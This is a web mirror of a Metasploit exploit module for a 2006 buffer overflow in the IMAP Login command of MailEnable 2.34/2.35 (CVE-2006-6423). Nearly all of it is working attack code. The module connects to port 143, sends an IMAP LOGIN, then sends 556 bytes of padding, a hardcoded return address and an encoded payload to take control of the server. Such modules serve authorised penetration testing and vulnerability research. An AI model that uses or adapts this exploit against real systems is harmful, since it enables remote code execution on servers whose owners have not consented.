CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/windows/imap/mailenable_login.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78include Msf::Exploit::Remote::Tcp910def initialize(info = {})11super(update_info(info,12'Name' => 'MailEnable IMAPD (2.34/2.35) Login Request Buffer Overflow',13'Description' => %q{14MailEnable's IMAP server contains a buffer overflow15vulnerability in the Login command.16},17'Author' => [ 'MC' ],18'License' => MSF_LICENSE,19'References' =>20[21[ 'CVE', '2006-6423'],22[ 'OSVDB', '32125'],23[ 'BID', '21492']24],25'Privileged' => true,26'DefaultOptions' =>27{28'EXITFUNC' => 'thread',29},30'Payload' =>31{32'Space' => 450,33'BadChars' => "\x00\x0a\x0d\x20",34'StackAdjustment' => -3500,35},36'Platform' => 'win',37'Targets' =>38[3940[ 'MailEnable 2.35 Pro',41{42'Ret' => 0x10049abb,43}44], #MEAISP.DLL4546[ 'MailEnable 2.34 Pro',47{48'Ret' => 0x76095d68,49'Offset' => 556,50}51], #push esp # ret | ascii {PAGE_EXECUTE_READ} [MSVCP60.dll]52],53'DisclosureDate' => '2006-12-11',54'DefaultTarget' => 0))5556register_options( [ Opt::RPORT(143) ])57end5859def exploit60connect6162auth = "a001 LOGIN " + rand_text_alpha_upper(4) + " {10}\r\n"63sploit = rand_text_alpha_upper(556) + [target.ret].pack('V')64sploit << payload.encoded + "\r\n\r\n"6566res = sock.recv(50)67if ( res =~ / OK IMAP4rev1/)68print_status("Trying target #{target.name}...")69sock.put(auth)70sock.get_once(-1, 3)71sock.put(sploit)72else73print_status("Not running IMAP4rev1...")74end7576handler77disconnect78end79end808182